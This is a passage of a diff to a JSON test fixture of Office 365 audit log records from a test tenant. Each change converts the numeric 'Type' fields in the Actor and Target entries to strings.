"c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9775,27 +9775,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9873,27 +9873,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9979,27 +9979,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10077,27 +10077,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10183,27 +10183,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10284,27 +10284,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10390,27 +10390,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10491,27 +10491,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10597,27 +10597,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10695,27 +10695,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10801,27 +10801,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10899,27 +10899,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11005,27 +11005,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11103,27 +11103,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11209,27 +11209,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11307,27 +11307,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11413,27 +11413,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11511,27 +11511,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11617,27 +11617,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11715,27 +11715,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11821,27 +11821,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11919,27 +11919,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12025,27 +12025,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12123,27 +12123,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12229,27 +12229,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12327,27 +12327,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12433,27 +12433,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12529,19 +12529,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12627,27 +12627,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12723,19 +12723,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12821,27 +12821,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12917,19 +12917,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13015,27 +13015,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13111,19 +13111,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13209,27 +13209,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13299,23 +13299,23 @@ "Target": [ { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13404,27 +13404,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13509,27 +13509,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13615,27 +13615,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13720,27 +13720,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13826,27 +13826,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13931,27 +13931,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14037,27 +14037,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14142,27 +14142,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14248,27 +14248,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, 